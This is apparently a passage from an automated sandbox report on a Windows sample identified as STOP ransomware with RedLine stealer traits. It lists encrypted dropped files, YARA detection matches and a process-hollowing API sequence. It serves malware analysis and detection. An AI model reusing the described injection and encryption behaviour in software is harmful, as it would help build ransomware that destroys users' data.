        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db entropy: 7.99291716786Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db entropy: 7.99323100473Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.session64 entropy: 7.99740611016Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Temp\chrome.exe entropy: 7.99845675525Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Temp\user-PC-20231005-0824.log entropy: 7.99486692556Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db entropy: 7.99006634322Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001c.db entropy: 7.99805481438Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db entropy: 7.99802733337Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db entropy: 7.99796305834Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Temp\jusched.log entropy: 7.99496288007Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl entropy: 7.9931580516Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Temp\offline.session64 entropy: 7.9970465457Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm entropy: 7.99143504067Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99678400715Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx entropy: 7.9976355692Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99275184488Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\18e190413af045db88dfbd29609eb877.db.pcqq (copy) entropy: 7.99323100473Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\18e190413af045db88dfbd29609eb877.db.session64.pcqq (copy) entropy: 7.99740611016Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\chrome.exe.pcqq (copy) entropy: 7.99845675525Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\user-PC-20231005-0824.log.pcqq (copy) entropy: 7.99486692556Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\jusched.log.pcqq (copy) entropy: 7.99496288007Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\offline.session64.pcqq (copy) entropy: 7.9970465457Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\wct1CF4.tmp.pcqq (copy) entropy: 7.99692079345Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\wct4F77.tmp.pcqq (copy) entropy: 7.99727123062Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\wct7BEC.tmp.pcqq (copy) entropy: 7.99749234057Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\wctCDBF.tmp.pcqq (copy) entropy: 7.99763604498Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Comms\UnistoreDB\store.jfm.pcqq (copy) entropy: 7.99143504067Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.pcqq (copy) entropy: 7.9976355692Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.pcqq (copy) entropy: 7.99275184488Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.pcqq (copy) entropy: 7.99736752943Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.pcqq (copy) entropy: 7.99612049432Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Microsoft\input\en-GB\userdict_v1.0809.dat.pcqq (copy) entropy: 7.99125522937Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.pcqq (copy) entropy: 7.99189983616Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.pcqq (copy) entropy: 7.99222537094Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.pcqq (copy) entropy: 7.99131924207Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.pcqq (copy) entropy: 7.99291716786Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\cversions.1.db.pcqq (copy) entropy: 7.99006634322Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001c.db.pcqq (copy) entropy: 7.99805481438Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.pcqq (copy) entropy: 7.99802733337Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db.pcqq (copy) entropy: 7.99796305834Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.pcqq (copy) entropy: 7.9931580516Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.pcqq (copy) entropy: 7.99678400715Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html.pcqq (copy) entropy: 7.99813683887Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.pcqq (copy) entropy: 7.99857750415Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1.pcqq (copy) entropy: 7.99780866643Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.pcqq (copy) entropy: 7.99388868447Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl.pcqq (copy) entropy: 7.99706977892Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat.pcqq (copy) entropy: 7.99486152292Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2.pcqq (copy) entropy: 7.99457472683Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat.pcqq (copy) entropy: 7.99591413099Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl.pcqq (copy) entropy: 7.99711062743Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl.pcqq (copy) entropy: 7.99748799195Jump to dropped file

        System Summary

        barindex
        Source: 10.2.tsnsd8pOvn.exe.22515a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 10.2.tsnsd8pOvn.exe.22515a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 2.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 2.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 13.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 13.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 5.2.tsnsd8pOvn.exe.22015a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 5.2.tsnsd8pOvn.exe.22015a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 13.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 13.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 6.2.tsnsd8pOvn.exe.22b15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 6.2.tsnsd8pOvn.exe.22b15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 12.2.tsnsd8pOvn.exe.21c15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 12.2.tsnsd8pOvn.exe.21c15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 8.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 8.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 11.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 11.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 6.2.tsnsd8pOvn.exe.22b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 6.2.tsnsd8pOvn.exe.22b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 10.2.tsnsd8pOvn.exe.22515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 10.2.tsnsd8pOvn.exe.22515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 0.2.tsnsd8pOvn.exe.22115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 0.2.tsnsd8pOvn.exe.22115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 2.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 2.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 5.2.tsnsd8pOvn.exe.22015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 5.2.tsnsd8pOvn.exe.22015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 8.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 8.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 7.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 7.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 7.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 7.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 12.2.tsnsd8pOvn.exe.21c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 12.2.tsnsd8pOvn.exe.21c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 0.2.tsnsd8pOvn.exe.22115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 0.2.tsnsd8pOvn.exe.22115a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 11.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 11.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 0000000A.00000002.2339633794.0000000002147000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000005.00000002.2213957997.0000000002164000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000006.00000002.2240762289.0000000002088000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000000.00000002.2147222942.0000000002178000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 0000000C.00000002.2413321844.000000000067E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
        Source: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 5000, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 972, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 6628, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 3180, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 416, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 6408, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 1208, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 6292, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 6956, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 1492, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_02210110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_02210110
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_02200110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,5_2_02200110
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,6_2_022B0110
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0040F8D00_2_0040F8D0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0040EAF00_2_0040EAF0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_022172200_2_02217220
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_022922C00_2_022922C0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0225E37C0_2_0225E37C
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_022173930_2_02217393
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0221A0260_2_0221A026
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0222F0300_2_0222F030
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0221B0000_2_0221B000
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0221B0B00_2_0221B0B0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_022170E00_2_022170E0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_022130F00_2_022130F0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_022200D00_2_022200D0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_022191200_2_02219120
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0225E1410_2_0225E141
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0223D1A40_2_0223D1A4
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0221A6990_2_0221A699
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0225B69F0_2_0225B69F
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0221E6E00_2_0221E6E0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0221C7600_2_0221C760
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0221A79A0_2_0221A79A
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0223D7F10_2_0223D7F1
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_022135200_2_02213520
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_022175200_2_02217520
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0221CA100_2_0221CA10
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_02217A800_2_02217A80
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_02220B000_2_02220B00
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_02212B600_2_02212B60
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0221DBE00_2_0221DBE0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_022178800_2_02217880
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_022318D00_2_022318D0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0222A9300_2_0222A930
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0221A9160_2_0221A916
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0223E9A30_2_0223E9A3
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0223F9B00_2_0223F9B0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_022159F70_2_022159F7
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_022189D00_2_022189D0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_02218E600_2_02218E60
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_02244E9F0_2_02244E9F
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_02252D1E0_2_02252D1E
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_02215DE70_2_02215DE7
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_02215DF70_2_02215DF7
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040D2402_2_0040D240
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00419F902_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040C0702_2_0040C070
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0042E0032_2_0042E003
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004080302_2_00408030
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004101602_2_00410160
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004C81132_2_004C8113
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004021C02_2_004021C0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0044237E2_2_0044237E
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004084C02_2_004084C0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004344FF2_2_004344FF
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0043E5A32_2_0043E5A3
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040A6602_2_0040A660
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0041E6902_2_0041E690
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004067402_2_00406740
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004027502_2_00402750
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040A7102_2_0040A710
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004087802_2_00408780
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0042C8042_2_0042C804
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004068802_2_00406880
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004349F32_2_004349F3
